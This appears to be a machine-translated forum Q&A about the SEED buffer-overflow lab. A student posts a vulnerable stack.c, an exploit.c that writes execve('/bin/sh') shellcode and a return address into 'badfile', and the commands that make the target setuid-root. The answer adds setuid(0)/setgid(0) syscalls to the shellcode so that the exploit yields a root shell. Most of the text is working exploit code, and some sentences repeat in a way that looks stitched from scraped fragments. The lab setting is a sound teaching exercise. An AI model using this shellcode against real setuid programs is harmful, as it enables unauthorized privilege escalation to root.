我想,您可以在shellcode中添加setuid()
和setgid()
syscall。
我正在执行一个任务(请参阅http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/),当我运行./stack
时,我得到的是Trace/breakpoint trap
而不是根shell。以下是我的exploit.c
(创建badfile
)和stack.c
(在其中读取badfile
并使用strcpy
将其复制到一个不足以处理它的缓冲区中)的代码。
exploit.c
/* exploit.c */ /* A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdq */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ memset(buffer + 39, 0xbf, 1); memset(buffer + 38, 0xff, 1); memset(buffer + 37, 0xf1, 1); memset(buffer + 36, 0x40, 1); strcpy(buffer + 492, shellcode); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }
stack.c
/* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task is to exploit this vulnerability */ #include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *str) { char buffer[24]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly\n"); return 1; }
我编译了stack.c并将权限设置为root,并带有]
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c root:/home/seed# chown root stack root:/home/seed# chmod 4755 stack
我以我自己(种子)的身份编译exploit.c并>]
seed:~$ gcc -g -o exploit exploit.c
我运行
./exploit
创建badfile
,但未收到任何错误。我运行./stack
并得到Trace/breakpoint trap
。如果运行
gdb stack
,我将获得外壳程序,但它不是根外壳程序。gdb-peda$ run Starting program: /home/seed/stack process 24232 is executing new program: /bin/dash $
如果我运行
seed:~$ ./stack -D_FORTIFY_SOURCE=0
,我将获得外壳程序,但再次不是root用户。seed:~$ ./stack -D_FORTIFY_SOURCE=0 $ id uid=1000(seed) gid=1000(seed) $
所以,我需要更改以获得root shell?
我正在分配作业(请参阅http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/),当我运行./stack时,我得到Trace / breakpoint陷阱而不是根外壳。 ...
我想,您可以在shellcode中添加setuid()
和setgid()
syscall。
char shellcode[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0); "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0); "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdq */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ;
当然,将所有者更改为
root
我想,您可以在shellcode中添加setuid()
和setgid()
syscall。